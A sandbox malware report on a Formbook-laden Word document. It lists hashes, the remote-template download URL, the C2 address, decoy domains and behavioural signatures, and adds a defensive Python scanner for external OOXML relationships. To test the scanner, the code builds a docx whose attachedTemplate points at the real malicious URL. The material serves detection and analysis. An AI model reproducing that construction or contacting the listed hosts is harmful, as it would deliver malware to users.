General

Target: PO523.docx
Size: 10KB
Sample: 210607-2mda12xg8a
MD5: e4afa614fdf22dbbbc6827eaae382588
SHA1: 68169a695313e88ef1e8f55ece0652ec592c85f4
SHA256: e030587e4c5e9109c8e7647da36ffa7ba97b0ee1a1a1039ee7cb1f0927d3e14b
SHA512: 47b7a48b530dff2b412db333a358c90627cb3a55de82ba576ab410f3bd4813616f1371e37037bda58ca061d1eddd3a0b30f79f4df3340e403ddc0ca21f7b258a
Tasks

Static task: static1
Behavioral task: behavioral1 (sample PO523.docx, resource win7v20210408)
Behavioral task: behavioral2 (sample PO523.docx, resource win10v20210410)
Malware Config

Extracted URL (the external location referenced by the OpenXML download signature below): http://37.120.206.70/Mend/m.wbk

Extracted family: formbook
Version: 4.1
URL: http://www.girlsnightbag.com/dms/
Domains (a Formbook config carries the live C2 path above together with a list of decoy domains the bot also contacts; the entries below are reproduced as extracted, without separating the two):
commachic.com
accessremits.com
dopefight.com
awdinfo.com
nguyenanhnhat.com
mailposse.com
teachingpart-time.com
nurseryhost.com
creamstudiosmedellin.com
analisisproject.com
sanfranciscotraining.com
elitestatusconsulting.com
liguosucai.com
aterrior.com
estudiowoodpecker.com
float10x10.com
sbcforward.info
beyondthetrench.com
pavingllc.com
womensspecialcare.com
purpose-power-peace.com
garaurepresent.com
inekasphotography.com
classimusic.com
royalsupport18.com
feelbeautifulwithdee.co.uk
jbxdc.com
cad11.com
carweekoutlaws.com
portprive.email
modoo-cash.com
the-selfie-masters.com
insuranceneedsdmv.com
levanahjoyas.com
tn-adrc.com
dgbkny.com
fartifications.com
oguzfreze.com
malikman.com
fiestamexicanasalsa.com
shrinkedfact.com
flatnoseranch.com
midwestsolutions.net
putwild.xyz
ftlauderdaleaesthetics.com
losfundadoresreliquia.com
1835a.com
thefemalephilosopherartist.com
rrplun.com
dealbasis.com
monashishaland.com
walterlotz.com
dettagliperu.com
ispartareklamajansi.com
minemeapp.com
arbhost.info
theoptimistheart.com
alquilerautocaravanas.net
upclubmusic.com
jygraphics.com
thermalerosion.com
preipowealthbuilding.com
ownthelightbetweenoceans.com
nivxros.com
Targets

Target: PO523.docx, 10KB (hashes as listed under General)

Signatures
- Formbook Payload
- Blocklisted process makes network request
- Downloads MZ/PE file
- Executes dropped EXE
- Abuses OpenXML format to download file from external location (the extracted URL http://37.120.206.70/Mend/m.wbk under Malware Config)
- Loads dropped DLL
- Uses the VBS compiler for execution
- Suspicious use of SetThreadContext (rewriting a thread's context is the execution-redirection step used by process hollowing and similar injection)
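The "Abuses OpenXML format to download file from external location" signature fires because a .docx is a zip of XML parts whose relationship files (*.rels) may point at targets with TargetMode="External"; when the relationship is one Word resolves on open (an attachedTemplate, OLE object, frame and so on), the remote file is fetched without a click. The scanner below is an added example written for this page, not code from the sandbox or from the sample: it walks every .rels part in a package, lists the external relationships, and separates the ones Word follows automatically from ordinary hyperlinks. The .docx it inspects is constructed in memory to reproduce that relationship layout (an external attachedTemplate in word/_rels/settings.xml.rels pointing at the URL reported above, plus a benign hyperlink); it is not PO523.docx itself, and the example.com hyperlink target is invented for the demonstration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
DOC_REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types Word resolves while opening the document. An external
# target on one of these is fetched with no user interaction, which is the
# mechanism behind the "download file from external location" signature.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "frame", "subDocument", "image"}

# URL reported above as extracted from PO523.docx.
REPORTED_TEMPLATE_URL = "http://37.120.206.70/Mend/m.wbk"


def external_relationships(docx_bytes):
    """Return (rels_part, short_type, target) for every TargetMode="External"
    relationship in an OOXML package, whether or not it is dangerous."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # a malformed .rels part deserves its own look; skipped here
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((name, short_type, rel.get("Target", "")))
    return found


def _is_remote(target):
    """True for http(s)/ftp/file URLs and UNC paths: anything that makes Word
    contact another host when the relationship is resolved."""
    if target.startswith("\\\\") or target.startswith("//"):
        return True
    return urlparse(target).scheme.lower() in {"http", "https", "ftp", "file"}


def remote_auto_fetch_targets(docx_bytes):
    """External relationships Word follows on open that point off-host.
    Hyperlinks are excluded on purpose: they are external by design and only
    fire on click, so they would bury the real signal in normal documents."""
    return [
        (part, short_type, target)
        for part, short_type, target in external_relationships(docx_bytes)
        if short_type in AUTO_FETCH_TYPES and _is_remote(target)
    ]


def build_sample_docx(template_url):
    """Constructed stand-in for a remote-template .docx (NOT the PO523.docx
    sample). It reproduces only the relationship layout the signature
    describes: settings.xml.rels with an external attachedTemplate, plus an
    ordinary hyperlink so the filter has something to leave out."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{DOC_REL_BASE}attachedTemplate" '
        f'Target="{template_url}" TargetMode="External"/>'
        '</Relationships>'
    )
    document_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{DOC_REL_BASE}settings" Target="settings.xml"/>'
        f'<Relationship Id="rId2" Type="{DOC_REL_BASE}hyperlink" '
        'Target="https://example.com/" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/document.xml.rels", document_rels)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    doc = build_sample_docx(REPORTED_TEMPLATE_URL)
    for part, short_type, target in remote_auto_fetch_targets(doc):
        print(f"{part}: {short_type} -> {target}")
```

Run against a real suspect document by replacing the constructed bytes with the file's contents; the .wbk/.dotm target is then the artifact to pull from the network capture, since the document itself carries no payload, only the pointer to it.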